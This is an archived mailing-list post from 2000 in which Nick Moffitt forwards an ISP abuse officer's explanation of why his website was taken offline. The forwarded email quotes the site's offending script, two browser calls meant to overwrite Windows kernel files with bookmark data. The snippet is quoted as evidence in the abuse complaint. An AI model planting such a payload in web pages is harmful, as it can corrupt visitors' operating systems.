[CrackMonkey] [larry@computerrific.net: Re: 204.94.189.42]

Nick Moffitt nick at zork.net
Sun Feb 27 23:09:29 PST 2000 

----- from Larry Sherman <larry at computerrific.net> -----

Date: Sun, 27 Feb 2000 22:40:00 -0800 (PST)
From: Larry Sherman <larry at computerrific.net>
To: Nick Moffitt <nick at zork.net>
Subject: Re: 204.94.189.42
In-Reply-To: <20000227173912.A13258 at zork.net>

Nick,

I received a notice from Verio Abuse regarding your 'www.crackmonkey.org'
site. The complaint had to do with malicious code in your default page.

Here are the lines involved:

<script>
window.external.ImportExportFavoriates(0,"c:\\winnt\system32\\ntoskrnl.exe");
</script>
<script>
window.external.ImportExportFavoriates(0,"c:\\winnt\system32\\krnl386.exe");
</script>

Although these system files are "protected" from overwrite, a system
could be destroyed if the unsuspecting visitor had a dual boot setup. The
non-booted system would end up with bookmarks instead of a krnl file.

I had no choice but to have your site taken off the Net. I expected the
Verio Abused department to contact you. It appears they didn't.

I _did_ hit your site many times, but I wasn't attacking it. I was
testing the null routing of 204.94.189.42. Curiously, my browser kept
accessing your site when it shouldn't have been able to.

You need to contact abuse at verio.net about the future of your routing.

Regards,

Larry

--
Larry Sherman
Director, Systems Operations
Verio Inc (Best Internet)


On Sun, 27 Feb 2000, at 5:39pm -0800, Nick Moffitt wrote:

> I must apologise for the tone of my previous e-mail.  I saw that a
> machine on your network had been repeatedly loading my site, and
> suspected foul play (Especially since there was a request for '/..', I
> assumed to exploit an old httpd flaw).
> 
> I called the NOC and they explained to me that you work for
> Best/Verio, and that you were in fact directly responsible for
> blocking my IP address in the verio routers.
> 
> A word that appeared in their notes was "abuse".  Now, I received no
> e-mail complaining about any abuse of Verio's services, and to my
> knowledge none of my users have been contacted either.  
> 
> I am still able to send and receive mail at zork.net, and would
> appreciate it if you could explain to me why exactly my machine is
> being forbidden from communicating with the Internet.
> 
> -- 
> CrackMonkey.Org - Non-sequitur arguments and ad-hominem personal attacks
> LinuxCabal.Org  - Co-location facilities and meeting space 
> 


----- End forwarded message -----

-- 
CrackMonkey.Org - Non-sequitur arguments and ad-hominem personal attacks
LinuxCabal.Org  - Co-location facilities and meeting space

More information about the Crackmonkey mailing list